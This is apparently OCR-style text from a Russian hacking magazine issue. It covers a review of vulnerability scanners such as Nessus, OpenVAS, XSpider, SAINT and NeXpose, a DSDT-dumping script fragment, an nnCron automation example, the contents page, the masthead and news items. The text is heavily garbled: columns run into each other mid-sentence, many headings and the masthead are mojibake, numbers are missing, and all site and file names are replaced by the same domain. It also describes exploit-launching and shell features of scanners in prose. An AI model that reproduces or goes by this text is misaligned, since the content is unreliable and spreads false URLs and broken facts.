xxd -r -p >
Else Да! Наша система идентифицируется ACPI $dmpdir/$tbl_goalma.org
{ как Darwin. $cdir/iasl -d $dmpdir/
If (_OSI ("Windows ")) Вернемся к тому, откуда этот текст, как его $tbl_goalma.org 1>
{ Store (0x04, OSVR) } получить и использовать. Как видишь, это /dev/null 2>&1
Else программа, написанная на языке, сходном с done
{ С. БИОС, при старте компьютера, генерирует echo -e "\nDone!"
If (_OSI ("Windows ")) goalma.org, который исполняется где-то в
{ фоновом режиме вне операционной системы. Вызываем программу Terminal. Создаем
Store (0x05, OSVR) Эту программу можно сохранить в бинар- папку DSDT:
} ном виде в файле в любой ОС, в том числе
Else в Windows. Для этого существует DSDT GUI mkdir DSDT
{ patcher for Windows. Если у тебя уже есть cd DSDT
If (_OSI ("FreeBSD")) MacOSX, можно проделать эту операцию и
{ в нем. Для этого необходимо создать такой Помещаем туда этот скрипт, назовем его
Store (0x06, OSVR) скрипт: goalma.org Помещаем в эту же папку ути-
} литу IASL (версию для Mac находим в интер-
Else #!/bin/bash нете или на диске к журналу). И запускаем
{ скрипт на исполнение:
If (_OSI ("HP-UX")) cdir='dirname $0'
{ dmpdir=acpitbls ./goalma.org
Store (0x07, OSVR) # Create a dump directory
} if [[ ! -d $dmpdir ]];then У нас появляется вложенная папка
Else mkdir $dmpdir acpitbls, внутри которой несколько фай-
{ fi лов — ACPI-таблиц, среди которых и файлы
If (_OSI ("OpenVMS")) goalma.org и goalma.org Последний пред-
{ # Dump ACPI table data from ioreg ставляет собой программу в текстовом виде,
9 ÑÊÀÍÅÐÎÂ
ÁÅÇÎÏÀÑÍÎÑÒÈ
ÏÎÄÁÎÐÊÀ ÈÍÑÒÐÓÌÅÍÒÎÂ ÄËß ÏÅÍÒÅÑÒÅÐÀ
У каждого из команды z — свои предпочтения по части софта и утилит для пентеста. Посовещавшись,
выяснили: выбор так разнится, что можно составить настоящий джентльменский набор из проверенных
программ. На том и решили. Чтобы не делать сборную солянку, весь список мы разбили на темы. Сегодня
мы коснемся святая святых любого пентестера — сканера уязвимостей.
Nessus
goalma.org
goalma.org
Free/Shareware
Win/nix/Mac
Если кто-то и не пробовал Nessus, то, по
меньшей мере, слышал о нем. Один из самых
известных сканеров безопасности имеет КЛИЕНТСКАЯ ЧАСТЬ NESSUS НА
богатую историю: будучи когда-то открытым FLEX’Е
НАСТРОЙКИ СКАНИРОВАНИЯ
проектом, программа перестала распростра-
OPENVAS
няться в открытых исходниках. К счастью, через удобный интерфейс на Flash’е, имея
осталась бесплатная версия, которая изна- один лишь браузер. После установки скане- Отличительная черта Nessus — умные
чально была сильно обделена в доступе к ра серверная запускается автоматически, плагины. Сканер никогда не будет скани-
обновлениям для базы уязвимостей и новым как только укажешь ключ для активации: ровать сервис только по номеру его порта.
плагинам, но позже разработчики сжалились ты бесплатно можешь запросить его на Переместив веб-сервер со стандартного
и лишь ограничили ее в периодичности домашнем сайте Nessus. Правда, для входа, го порта, скажем, на й, обмануть
апдейтов. Плагины — ключевая особенность и локального, и удаленного, понадобится Nessus не удастся — он это определит.
архитектуры приложения: любой тест на про- предварительно создать пользователя: в Если на FTP-сервере отключен анонимный
никновение не зашивается наглухо внутрь винде это делается в два клика мыши через пользователь, а часть плагинов использу-
программы, а оформляется в виде подклю- GUI-админку Nesus Server Manager, с ее же ют его для проверки, то сканер не будет их
чаемого плагина. Аддоны распределяются на помощью можно запускать и останавливать запускать, заведомо зная, что толку от них не
42 различных типа: чтобы провести пентест, сервер. будет. Если плагин эксплуатирует уязвимость
можно активировать как отдельные плагины, Любой тест на проникновение начинается с в Postfix’е, Nessus не будет пытать счастья,
так и все плагины определенного типа — создания так называемых Policies — правил, пробуя тесты против sendmail’а — и т.д.
например, для выполнения всех локальных которых сканер будет придерживаться во Понятно, что для выполнения проверок на
проверок на Ubuntu-системе. Причем никто время сканирования. Здесь-то и выбираются локальной системе, необходимо предоста-
не ограничивает тебя в написании собствен- виды сканирования портов (TCP Scan, UDP вить сканеру Credentials (логины и пароли
ных тестов на проникновения: для этого в Scan, Syn Scan и т.д.), количество одно- для доступа) — это завершающая часть
Nessus был реализован специальный скрип- временных подключений, а также типичные настройки правил.
товый язык — NASL (Nessus Attack Scripting чисто для Nessus опции, как, например,
Language), который позже позаимствовали и Safe Checks. Последняя включает безопас- OpenVAS
другие утилиты. ное сканирование, деактивируя плагины, goalma.org
Еще большей гибкости разработчики доби- которые могут нанести вред сканируемой Freeware
лись, отделив серверную часть сканера, системе. Важный шаг в создании правил — Win/nix/Mac
выполняющего все действия, от клиентской это подключение нужных плагинов: можно Несмотря на то, что исходные коды Nessus
программы, представляющей собой не более активизировать целые группы, скажем, стали закрытыми, движок Nessus 2 и часть
чем графический интерфейс. В последней Default Unix Accounts, DNS, CISCO, Slackware плагинов по-прежнему распространяются
версии демон на порту открывает Local Security Checks, Windows и т.д. Выбор по лицензии GPL в виде проекта OpenVAS
веб-сервер; с ним можно управлять сканером возможных атак и проверок — огромный! (OpenSource Vulnerability Assessment
XSpider 7
goalma.org
goalma.org
Shareware
Win
Первые строчки кода XSpider были напи- РАЗНЫЕ ВИДЫ СКАНИРОВАНИЯ
ОТЧЕТ О СКАНИРОВАНИИ ХОСТА В саны 2 декабря года, а за прошедшие GFI LANGUARD
XSPIDER с тех пор 12 лет этот сканер стал известен
каждому российскому специалисту по инфор-
Scanner). Сейчас проект развивается совер- мационной безопасности. Вообще, Positive GFI LANguard
шенно независимо от своего старшего Technologies — одна из немногих компаний goalma.org
брата и делает немалые успехи: последняя на отечественном рынке информацион- Freeware/Shareware
стабильная версия вышла как раз перед ной безопасности, чьи сотрудники умеют Win
отправкой номера в печать. Неудивительно, реально что-то ломать, а не только красиво Я особенно люблю этот продукт — за набор
что OpenVAS так же использует клиент- продавать услуги. Продукт был написан не предустановленных профилей для сканирова-
серверную архитектуру, где все операции программистами, а специалистами по ИБ, ния. Помимо полного сканирования удален-
сканирования выполняются серверной знающими, как и что надо проверять. Что в ной системы, подразумевающего все виды
частью — она работает только под никсами. итоге? Имеем очень качественный продукт с доступных проверок (кстати, есть специальная
Для запуска потребуется закачать пакеты одним лишь, но весьма серьезным для нас версия для медленного коннекта — напри-
openvas-scanner, а также набор библиотек минусом: XSpider платный! Задаром разра- мер, для тормозного VPN-соединения через
openvas-libraries. В качестве клиентской ботчики предлагают урезанную демо-версию, Штаты), есть масса отдельных групп проверок.
части для OpenVAS доступна только в которой не реализован целый ряд проверок, Например, можно быстро проверить десят-
никсовая GUI-программа, но, думаю, что, в том числе эвристических, а также онлайн- ки хостов на наличие уязвимостей из Top20,
как у предыдущих версий, скоро появится обновления для базы уязвимостей. Более составленной известной security-корпорацией
порт для винды. В любом случае, проще того, силы разработчиков сейчас всецело SANS. Тут же можно активировать и поиск
всего воспользоваться OpenVAS при помо- направлены на другой продукт — систему машин с неустановленными патчами или
щи небезызвестного LiveCD Bactrack (4-ая мониторинга информационной безопасно- сервис-паками, выбрать профиль для пентеста
версия), в котором он уже установлен. Все сти MaxPatrol, для которой, увы, нет даже и веб-приложений и т.д. Причем, кроме профи-
основные операции для начала работы демки. лей, непосредственно направленных на поиск
вынесены в пункты меню: OpenVAS Make Но даже при всех ограничениях XSpider уязвимостей, есть и ряд средств для аудита:
Cert (создание SSL-сертификата для доступа является одним из самых удобных и эффек- поиск шар, умный сканер портов, в том числе
к серверу), Add User (создание юзера для тивных инструментов анализа безопасности для поиска открытых малварью соединений,
доступа к серверу), NVT Sync (обновление сети и конкретных узлов. Настройки скани- определение конфигурации компьютера и т.д.
плагинов и баз уязвимостей), и, в конце кон- рования, как и в случае Nessus, оформля- Получается, в одном продукте уживаются масса
цов, OpenVAS Server (запуск сервера через ются в виде специального набора правил, полезных утилит. Постоянно обновляемая база
пункт меню). Далее остается только запу- только в данном случае они называются не уязвимостей GFI LANguard включает более
стить клиентскую часть и выполнить под- Policies, а профилями. Настраиваются как записей, позволяя сканировать самые
ключение к серверу для начала пентеста. общие параметры для сетевого анализа, разные системы (Windows, Mac OS, Linux), в
Открытость и расширяемость OpenVAS позво- так и поведение сканера для конкретных том числе, установленные на виртуальных
лила сильно прокачать программу. Помимо протоколов: SSH, LDAP, HTTP. Тип исследуе- машинах. Сканер автоматически подтягивает
непосредственно плагинов для анализа мого демона на каждом порту определяется обновления для базы, которые в свою очередь
защищенности, в нее интегрировано немало не по общепринятой классификации, а с формируются по отчетам BugTraq, SANS и дру-
известных утилит: Nikto для поиска уязвимых использованием эвристических алгорит- гих компаний. Реализовать свои собственные
CGI-сценариев, nmap для сканирования пор- мов fingerprinting’а — опция включается проверки, как водится, можешь и ты сам. Для
тов и моря других вещей, ike-scan для обна- одним кликом в профиле сканирования. этого предоставляется специальный скрип-
ружения IPSEC VPN узлов, amap для иден- Отдельного слова заслуживает обработка товый язык, совместимый с Python и VBScript
тификации сервисов на портах, используя RPC-сервисов (Windows и *nix) с полной (какова связка!), а для полного удобства еще и
идентификацией, благодаря которой удается удобный редактор с дебагером — получается
СКАНЕР ОТ ИЗВЕСТНОЙ SECURITY- определить уязвимости различных сервисов настоящая IDE. Еще одна уникальная фишка
КОМПАНИИ EEYE и детальную конфигурацию компьютера в LANguard’а — возможность определения того,
целом. Проверка слабости парольной защи- что машина запущена в виртуальном окруже-
ты реализует оптимизированный подбор нии (пока поддерживается VMware и Virtual
паролей практически во всех сервисах, тре- PC) — это одна из уникальных фишек сканера.
бующих аутентификации, помогая выявить
слабые пароли. Результат сканирования Retina Network Security
оформляется в виде удобного отчета, при- Scanner
чем для каждой найденной потенциальной goalma.org
уязвимости выдается крохотное описание Shareware
и внешний линк, куда можно обратиться за Win
подробностями. Главное разочарование этого легендарного
сканера постигло меня сразу после запуска. Установщик сти ОС, приложений, потенциально опасные настройки и
последней версии, выругавшись, сказал, что запустить параметры. В результате можно получить обзорный план
Retina на Windows 7 или Windows Server R2 на сети с отображением потенциально уязвимых мест. База
WARNING текущий момент нельзя. Не очень-то вежливо, при- с уязвимостями, по заверениям разработчиков, обновля-
шлось открывать виртуальную машину, но я-то знал: ется ежечасно, а информация об уязвимости попадает в
оно того стоит. Retina — один из лучших сканеров, кото- базу не позднее 48 часов после появления о ней первого
рый определяет и анализирует хосты локальной сети. бактрака. Впрочем, сам факт, что это продукт фабрики
warning Физические и виртуальные серверы, рабочие станции eEye, уже является своего рода гарантией качества.
Пентест серверов и ноутбуки, маршрутизаторы и аппаратные брандмауэ-
и ресурсов без воли их ры — Retina представит полный список подключенных Microsoft Baseline Security
владельцев — к сети устройств, выведет информацию о беспроводных Analyzer
деяние уголовно сетях. Каждый из них она всячески будет пытать в поиске goalma.org
наказуемое. В случае хоть какого-то намека на уязвимость, и делает это очень Freeeware
использования по- шустро. На сканирование локальной сети класса С уходит Win
лученных знаний примерно 15 минут. Продукт Retina определяет уязвимо- Что это такое? Анализатор безопасности от компании
в незаконных целях Microsoft, который проверяет компьютеры в сети на
автор и редакция соответствие требованиям Microsoft, которых набралось
ВЕБ-МОРДА СКАНЕРА SAINT
ответственности не немалое количество. Самый главный критерий — это,
несут. конечно же, наличие на системе всех установленных
обновлений. Не надо напоминать, что сделал Conficker,
используя брешь MS, патч для которой вышел за 2
месяца до эпидемии. Помимо отсутствующих в системе
DVD патчей, MBSA обнаруживает и некоторые распростра-
ненные бреши в конфигурации. Перед началом скани-
рования программа скачивает обновления для своих
dvd баз, поэтому можно быть уверенным: Microsoft Baseline
Большую часть пред- Security Analyzer знает все о вышедших апдейтах для
ставленных в обзоре винды. По результатам сканирования (домена или диа-
утилит ты найдешь на пазона IP-адресов) выдается сводный отчет. И без того
нашем DVD-диске. наглядный репорт можно перенести на условную схему
сети, отобразив результаты сканирования в Visio. Для
этого на сайте программы доступен специальный соеди-
нитель, который отобразит символами различные узлы
локалки, заполнит параметры объектов, добавив туда
информацию о сканировании, и в удобнейшей форме
SAINT
goalma.org
Shareware
nix
Всего лишь два IP-адреса, на которые ты
сможешь натравить SAINT в течение триаль-
ного периода, жестко зашиваются в ключ,
и он отправляется тебе на е-мейл. Ни шагу
влево, ни шагу вправо — но этот продукт обя-
зательно стоит попробовать, даже с такими
драконовскими ограничениями. Управление
сканером реализуется через веб-интерфейс,
что неудивительно — решения SAINT про- X-SCAN УМЕЕТ ПОДКЛЮЧАТЬ ПЛАГИНЫ NESSUS
даются, в том числе, в виде серверов для
установки в стойку (SAINTbox), а тут нужно Последняя версия этого сканера вышла еще рела проект Metasploit Framework, и
следовать моде. С помощью аскетичного веб- в году, что вовсе не мешает использо- именно ее рук дело — проект NeXpose.
интерфейса очень просто можно запустить вать его сейчас благодаря системе подклю- Стоимость «входа» для использования
тестирование и использовать многолетние чаемых плагинов и скриптов, написанных на коммерческой версии составляет без
наработки для поиска потенциально уязви- языке NASL, таком же, который используется малого $, но для энтузиастов есть
мых мест в системе. Скажу больше: один из в Nessus/OpenVAS. Найти и отредактиро- Community-версия с чуть-чуть урезан-
модулей SAINTexploit позволяет не только вать имеющиеся скрипты несложно — все ными возможностями. Такая бесплат-
обнаружить, но еще и эксплуатировать уязви- они находятся в папке scripts. Для запуска ная версия легко управляется через
мость! Возьмем пресловутую ошибку MS сканера необходимо обозначить параметры веб-интерфейс, а также интегрируется
Если сканер обнаруживает неприкрытую сканирования через меню Config Æ Scan с Metasploit’ом (нужна версия не ниже
дырку и знает, как ее эксплуатировать, то Parameter. В качестве объекта сканирования ). Схема работы достаточно хитрая:
прямо рядом с описанием уязвимости дает может выступать как конкретный IP, так и сначала запускается NeXpose, далее
ссылку с близким сердцу словом EXPLOIT. В диапазон адресов, но в последнем случае Metasploit Console (msfconsole), после
один клик ты получаешь описание сплоита надо быть морально готовым к тому, что чего можно запускать процесс сканиро-
и, более того, — кнопку Run Now для его тестирование будет длительным. Сканер, вания и настраивать его с помощью ряда
запуска. Далее, в зависимости от сплоита, увы, не самый быстрый. На скорость про- команд (nexpose_connect, nexpose_scan,
указываются различные параметры, напри- порционально влияет и количество подклю- nexpose_discover, nexpose_dos и дру-
мер, точная версия ОС на удаленном хосте, ченных модулей: дополнения, проверяющие гие). Прикольно, что можно совмещать
тип шелла и порт, на котором он будет запу- стойкость паролей для SSH/VNC/FTP, одни из функциональность NeXpose и других
щен. Если эксплуатирование цели удачно самых прожорливых. Внешне X-Scan больше модулей Metasploit’а. Самый простой, но
завершено, то во вкладке Connections модуля напоминает самоделку, созданную кем-то действенный пример: искать компьютеры
SAINTexploit появляется IP-адрес жертвы и для собственных нужд и пущенную в паблик с некой уязвимостью и тут же эксплуати-
выбор действий, которые стали доступными на свободное плавание. Возможно, он бы ровать ее с помощью соответствующего
в результате запуска эксплоита: работа с и не получил такой популярности, если не модуля Metasploit — получаем авторутинг
файлами на удаленной системе, командная поддержка скриптов Nessus, которые акти- на новом качественном уровне. z
строка и т.д! Представляешь: сканер, кото- вируются с помощью модуля Nessus-Attack-
рый сам ломает! Недаром слоган продукта: Scripts. С другой стороны, стоит посмотреть
«Examine. Expose. Exploit». Система проверок отчет о сканировании, и все сомнения в
самая разнообразная, причем в последней полезности сканера отходят на второй план. ИНТЕГРИРУЕМ NEXPOSE
7-й версии появился модуль для пентеста Он не будет оформлен по одному из офици- В METASPLOIT
веб-приложений и дополнительные возмож- альных стандартов ИБ, но точно расскажет
ности для анализа баз данных. Обозначив много нового о сети.
цель через веб-интерфейс, можно наблюдать
за действиями сканера со всеми подробно- Rapid 7 NeXpose
стями, точно зная, что и как сканер делает в goalma.org
текущий момент. Freeeware-версия
nix/Win
X-Scan Rapid 7 — одна из самых быстро расту-
goalma.org щих компаний, специализирующихся
Freeware на информационной безопасности,
Win в мире. Именно она недавно приоб-
ÑÅÊÐÅÒÛ
ÀÂÒÎÌÀÒÈÇÀÖÈÈ
ÍÅÑÊÎËÜÊÎ ÏÐÈÌÅÐΠÒÎÃÎ, ÊÀÊ ÎÁËÅÃ×ÈÒÜ
ÑÅÁÅ ÆÈÇÍÜ
ÏÎÏÐÎÁÓÉ ÏÎÑ×ÈÒÀÒÜ, ÑÊÎËÜÊÎ ÂÐÅÌÅÍÈ Ó ÒÅÁß ÓÕÎÄÈÒ ÂÏÓÑÒÓÞ ÍÀ ÂÛÏÎËÍÅÍÈÅ ÎÄ-
ÍÈÕ È ÒÅÕ ÆÅ ÄÅÉÑÒÂÈÉ. ÍÅÏÐÎÑÒÀß ÇÀÄÀ×À? ÇÀÒÎ ÀÂÒÎÌÀÒÈÇÈÐÎÂÀÒÜ ×ÀÑÒÜ ÐÓÒÈÍÍÎÉ
ÐÀÁÎÒÛ ÌÎÆÍÎ ÇÀÏÐÎÑÒÎ. È ÁÜÞÑÜ ÎÁ ÇÀÊËÀÄ, ÒÀÊÀß ÐÓÒÈÍÀ ÅÑÒÜ Ó ÊÀÆÄÎÃÎ.
×
тобы не быть голословными, разберем появилась такая возможность в виде опции стим (но обязательно положим на диск PDF
несколько конкретных задач, отыскав TCP Rate Control, позволяющей подстраивать статьи «Пусть он все делает сам!» со всеми
для их решения подходящие утилит ы. скорость TCP-соединений клиента так, чтобы подробностями) и сразу приступим к делу.
К счастью, под виндой с помощью всего его работа не мешала другим приложениям. Главный наш помощник — функция WatchProc,
двух-трех утилит можно автомати- Мало этого, когда-то давно я устанавливал которая отслеживает состояние процесса
зировать абсолютно все и легко эмулировать специальный cFos-драйвер, с помощью кото- в памяти. Как только в памяти появится
действия пользователя. Итак, первая задачка. рого можно было задать низкий приоритет для goalma.org (наш скринсейвер), с помощью
торрента, а высокий — для браузера. Однако START-APP мы запустим приложение:
ÇÀÄÀ×À: ценность нашего примера именно в том, чтобы
Отслеживать активность работы пользователя обработать событие, когда компьютер находит- #( Torrent_start
и в периоды простоя выполнять ресурсоемкие ся в idle-режиме (т.е. ничего не делает), и от AsLoggedUser
задачи. этого уже плясать. LoadProfile
Проще всего отслеживать появление в памяти User: «username» SecPassword:
ÐÅØÅÍÈÅ: процесса скринсейвера и в этот момент запу- «passhash» Domain: «DOMAIN»
Нет ничего лучше, чем загрузить компьютер скать utorrent и, наоборот, когда его процесс LogonInteractive
выполнением какой-то ресурсоемкой опе- выгружается из памяти, закрывать utorrent. В WatchProc: «goalma.org»
рации в тот момент, когда это нас никак не нашем давнишнем материале про автомати- Rule: PROC-EXIST: «goalma.org»
побеспокоит, а именно, когда за компьютером зацию мы уже рассказывали тебе о замеча- NOT
никого нет. Такая возможность, кстати, есть у тельной программе nnCron (goalma.org). Action:
некоторых прогрессивных продуктов: тот же Этот уникальный планировщик задач не только StartIn: «C:\Program Files\
Norton Antivirus имеет функцию Idle Scan и умеет запускать процессы по расписанию, но uTorrent»
очень четко выполняет полное или частичное и способен отслеживать файлы, флаги, окна, ShowNormal NormalPriority
сканирование системы в момент отсутствия процессы, движения мыши, время простоя START-APP: C:\Program Files\
пользователя. Или вот другой полезный компьютера, клавиатурные шорткаты, выход в uTorrent\goalma.org
пример — чтобы торрент-клиент не мешал онлайн/оффлайн, появление диска в драйве, )#
серфингу, предоставлять ему максимальную наличие хоста в сети (пинг), изменение уда-
ширину канала, когда за компьютером никто ленного ресурса по http-протоколу, количество И напротив, когда процесс выгрузится из
не работает. Попробуем реализовать это на свободного места на диске, загруженность памяти, то закрываем и окно utorrent'а:
примере uTorrent (goalma.org). Тут надо оперативной памяти и многое другое. Вводную
сказать, что в самом клиенте не так давно часть по использованию программы мы опу- #( Torrent_stop
ControlTreeView ("Computer Management", "", , "Expand", $treeitem) $treeitem = $treeitem & " user
РЕ
СТР. 20
КО ЦЕ
М НА
ЕН :
ДО
ВА р.
НН
ЯА
LISP ВОЛШЕБНЫЕ
МЕТОДЫ
VS. JAVA
×ÒÎ È ÍÅ ÑÍÈËÎÑÜ
ÍÎÂÛÉ Ê ËÀÑÑ
ÎØÈÁÎÊ
ÐÀÇÐÀÁÎÒ×ÈÊ ÀÌ Â ÑÊÐÈÏÒÀ Õ PHP
JAVA ÑÒÐ. 48
ÑÒÐ.
ПРОСЛУШКА SKYPE
прослушкa СТР. 94
БОРЬБА
СЕТЕВЫЕ С СИНИМ
РЕГУЛИРОВЩИКИ
ÂÛÁÈÐÀÅÌ ÄÈÑÒÐÈÁÓÒÈÂ
ЗМИЕМ
ÏÐÎÔÈËÀÊÒÈÊ À BSOD
ÄËß ÑÎÇÄÀÍÈß ÄËß ÍÀ×ÈÍÀÞÙÅÃÎ
ÐÎÓÒÅÐÀ ÄÐÀÉÂÅÐÎÏÈÑÀÒÅËß
 ÷åì ñåêðåò? Ïðîñòî ìû òóò ðàññóäèëè, ÷òî ïîðà ïåðåõîäèòü íà íîâûé ãðàôèê: ÷òîáû z ïîÿâëÿëñÿ â êèîñêàõ
ê íà÷àëó ìåñÿöà, à íå â õ ÷èñëàõ, êàê áûëî ðàíüøå. Ñîáñòâåííî, íà÷èíàÿ ñî ñëåäóþùåãî íîìåðà, òàê è
áóäåò: ìàðòîâñêèé íîìåð âûéäåò â êîíöå ôåâðàëÿ, àïðåëüñêèé — â êîíöå ìàðòà è òàê äàëåå äî êîíöà ýòîãî
ãîäà, êîãäà âûéäåò íîìåð ßíâàðü
Âîò òàêîé òåõíè÷åñêèé ìîìåíò.  îñòàëüíîì âñå ïî-ñòàðîìó: â ýòîì íîìåðå òåáÿ æäåò êó÷à íîâûõ êîíöåïòîâ
âçëîìà è çàùèòû, èíòåðåñíûõ îáçîðîâ, èäåé, òðþêîâ è ñîâåòîâ.
Ïðèÿòíîãî ÷òåíèÿ!
[email protected]
Content
MegaNews ÃÎÂÎÐßÙÈÉ ÏÈÍÃÂÈÍ
Учим Linux говорить и слушать
Кодинг
Ferrum ÁÎÐÜÁÀ Ñ ÑÈÍÈÌ ÇÌÈÅÌ
Краткий мануал по профилактике
ÃÎÍÊÈ ÍÀ «ÊÀÌÍßÕ» BSOD для начинающего драйверописателя
Сравнительное тестирование процессоров различной
архитектуры от Intel и AMD ÐÎÁÎÒ ÄËß GOOGLE WAVE
Напишем его на Python’е!
SYN/ACK
Взлом ÎÄÍÈÌ ÌÀÕÎÌ
Централизованное развертывание Windows 7
EASY-HACK при помощи SCCM SP2
Хакерские секреты простых вещей
ÑÈÌÁÈÎÒÈ×ÅÑÊÀß ÑÂßÇÜ
ÎÁÇÎÐ ÝÊÑÏËÎÈÒÎÂ Настраиваем связку SharePoint ,
Анализ свеженьких уязвимостей Exchange Server и Active Directory
X-TOOLS
Программы для взлома
Юниты
PSYCHO
Сцена Уязвимые личности:руководство
по эксплуатации
ÄÈÑÊÎ
Юниксойд
Гб всякой всячины
WWW2
Удобные web-сервисы
×ÅÐÒÅÍÎÊ ÈÇ ÒÀÁÀÊÅÐÊÈ
Детальный обзор FreeBSD
/ÐÅÄÀÊÖÈЯ Антон «Ant» Жуков >Менеджеры , Ìîñêâà,
>Ãëàâíûé ðåäàêòîð >Монтаж видео Ольга Емельянцева Ãëàâïî÷òàìò, à/ÿ , Õàêåð
Íèêèòà «nikitozz» Êèñëèöèí Максим Трубицын Мария Нестерова Çàðåãèñòðèðîâàíî â Ìèíèñòåðñòâå
([email protected]) Мария Николаенко Ðîññèéñêîé Ôåäåðàöèè ïî äåëàì ïå÷àòè,
>Âûïóñêàþùèé ðåäàêòîð /PUBLISHING Максим Соболев òåëåðàäèîâåùàíèþ è ñðåäñòâàì ìàññîâûõ
Николай«gorl»Андреев Надежда Гончарова êîììóíèêàöèé ÏÈ ß îò 14
([email protected]) >Ó÷ðåäèòåëü Наталья Мистюкова ôåâðàëÿ ã.
>Ðåäàêòîðû ðóáðèê ÎÎÎ «Ãåéì Ëýíä» >Администратор Îòïå÷àòàíî â òèïîãðàôèè
ÂÇËÎÌ , Москва, ул. Тимура Фрунзе, Мария Бушева «Lietuvas Rivas», Литва.
Дмитрий«Forb» Докучаев д. 11, стр. >Работа с рекламными агентствами Òèðàæ ýêçåìïëÿðîâ.
([email protected]) Тел.: +7 () Лидия Стрекнева ([email protected]) Öåíà äîãîâîðíàÿ.
PC_ZONE и UNITS Факс: +7 () >Старший менеджер Ìíåíèå ðåäàêöèè íå îáÿçàòåëüíî
Степан «step» Ильин >Генеральный дèðåêòîð Светлана Пинчук ñîâïàäàåò ñ ìíåíèåì àâòîðîâ. Ðåäàêöèÿ
([email protected]) Äìèòðèé Àãàðóíîâ >Старший трафик-менеджер óâåäîìëÿåò: âñå ìàòåðèàëû â íîìåðå
UNIXOID, SYN\ACK и PSYCHO >Óïðàâëÿþùèé äèðåêòîð Марья Алексеева ïðåäîñòàâëÿþòñÿ êàê èíôîðìàöèÿ ê
Àíäðåé «Andrushock» Ìàòâååâ Äàâèä Øîñòàê ðàçìûøëåíèþ. Ëèöà, èñïîëüçóþùèå
([email protected]) >Äèðåêòîð ïî ðàçâèòèþ
/ÎÏÒÎÂÀЯ ÏÐÎÄÀÆÀ äàííóþ èíôîðìàöèþ â ïðîòèâîçàêîííûõ
ÊÎÄÈÍà >Äèðåêòîð îòäåëà öåëÿõ, ìîãóò áûòü ïðèâëå÷åíû ê
Ïàøà Ðîìàíîâñêèé
Александр «Dr. Klouniz» Лозовский äèñòðèáóöèè îòâåòñòâåííîñòè. Ðåäàêöèÿ â ýòèõ ñëó÷àÿõ
>Äèðåêòîð ïî ïåðñîíàëó
([email protected]) Àíäðåé Ñòåïàíîâ îòâåòñòâåííîñòè íå íåñåò.
Татьяна Гудебская
ФРИКИНГ >Ôèíàíñîâûé äèðåêòîð
([email protected]) Ðåäàêöèÿ íå íåñåò îòâåòñòâåííîñòè çà
Сергей Долин >Руководитель московского ñîäåðæàíèå ðåêëàìíûõ îáúÿâëåíèé â
Анастасия Леонова
>Ëèòåðàòóðíûй ðåäàêòîð направления íîìåðå. Çà ïåðåïå÷àòêó íàøèõ ìàòåðèàëîâ
>Редакционный директор
Дмитрий Лященко Дмитрий Ладыженский
Ольга Девальд áåç ñïðîñà — ïðåñëåäóåì.
([email protected]) >PR-менеджер
([email protected]) По вопросам лицензирования и получения
>Руководитель регионального прав на использование редакционных ма-
Наталья Литвиновская
/ART >Директор по маркетингу
направления териалов журнала обращайтесь по адресу:
>Àðò-äèðåêòîð Òàòüÿíà Êîøåëåâà [email protected]
Дмитрий Плющев
Евгений Новиков >Главный дизайнер
([email protected] ) В октябрьский номер за год вкралась
([email protected]) >Руководитель отдела подписки досадная опечатка. Автором статьи
Энди Тернбулл
>Верстальщик Марина Гончарова «Рожденные мультимедиа революцией»
>Директор по производству
Вера Светлых Сергей Кучерявый
([email protected]) является Юрий «bober» Раззоренов (zloy.
([email protected]) òåë.: () [email protected]), а не Юрий Видинеев.
/DVD /ÐÅÊËÀÌÀ ôàêñ: () Редакция приносит свои извинения за эту
>Выпускающий редактор / Тел.: () , факс: () > Ãîðячая ëèíèя ïî ïîäïèñêå ошибку.
Степан «Step» Ильин >Директор группы GAMES & DIGITAL òåë.: 8 () © ÎÎÎ «Ãåéì Ëýíä», РФ,
([email protected]) Евгения Горячева ([email protected]) Áåñïëàòíî äëÿ çâîíÿùèõ èç Ðîññèè
>Редактор Unix-раздела > Äëя писем
MEGANEWS МАРИЯ «MIFRILL» НЕФЕДОВА [email protected]
MEGANEWS
ÎÁÎ ÂÑÅÌ ÇÀ ÏÎÑ ËÅÄÍÈÉ ÌÅÑßÖ
3G-ÒÅËÅÔÎÍÛ ÎÒ ÌÒÑ
ÂÅÍÄÅÒÒÀ Ñ ÏÐÎÂÀÉÄÅÐÎÌ
В Бельгии властям удалось вычислить еще паролей, подтвердив, что он
и поймать хакера-шантажиста, скры- не блефует. Слив, правда, был зарезан
вавшегося под ником Vendetta. Этот на корню модераторами форума, где
товарищ нашел некую дырку в системе Vendetta выкладывал пароли — они
безопасности крупнейшего провайде- почти сразу удалили криминальный
ра страны — Belgacom, и угрожал опуб- мессаг. В итоге, Belgacom проблему
ликовать в сети тыс. паролей его все же признал, но не совсем так,
юзеров. Выложив первые 30 паролей в как хотелось бы хакеру — провайдер
широкий доступ, хакер выдвинул всего обратился в органы, прямиком в бель-
одно, очень простое требование — гийский аналог нашего «отдела «К».
он хотел, чтобы Belgacom предоставил Киберполицейские сработали весьма
своим пользователям нормальный оперативно — поимка Vendetta заняла
безлимитный тариф. Дело в том, что чуть более месяца. Шантажистом
пров установил жесткие лимиты на ска- оказался летний студент факультета
чивание — от 4 до 60 гигабайт в месяц информационных технологий. Теперь
и никакого анлима. Когда провайдер борцу за безлимит грозит до трех лет
никак не отреагировал на этот выпад, тюрьмы.
борец за справедливость слил в сеть
PC27
PC27 J3
×ÓÄÅÑÀ ÌÈÍÈÀÒÞÐÈÇÀÖÈÈ
Компания VIA представила широкой публике материнскую плату рекордного размера —
всего 6 х 6 см. Новый форм-фактор в компании назвали Mobile-ITX. Это, казалось бы,
здорово и новость — лишний повод порадоваться достижениям прогресса, но не все так
просто. На деле хитрецы из VIA, фактически, разделили обычную материнскую плату на
две части, представив меньшую как «новый форм-фактор», а вторую часть, которая, кстати,
больше примерно в раза, назвали «дополнительной платой ввода-вывода». Очень
тонкая ирония, учитывая, что на «дополнительной» плате расположилась и батарейка, и
часть контроллеров портов, и другие «ненужные» вещи :). На меньшей же части девайса
уместились процессор C7M тактовой частотой 1 ГГц и Мб DDRII /MHz SDRAM.
Энергопотребление малютки составляет не более 12 Вт, и пассивного охлаждения плате
вполне хватает. Справедливости ради все же отметим, что размер платы ввода-вывода
может варьироваться в зависимости от ее конфигурации, так что определенной степени
миниатюрности VIA, конечно, действительно достигли.
GOOGLE DNS
Пожалуй, сейчас стало проще сказать, каких посему мы расскажем только о том, что Google сений Google заверяет, что не будет записывать
сервисов пока нет у компании Google, чем запустил сервис Public DNS. Собственный никакую частную информацию пользователей,
перечислить уже существующие. Но «Гуглу» DNS-сервис поискового гиганта призван по- а IP-адреса не станет хранить дольше пары
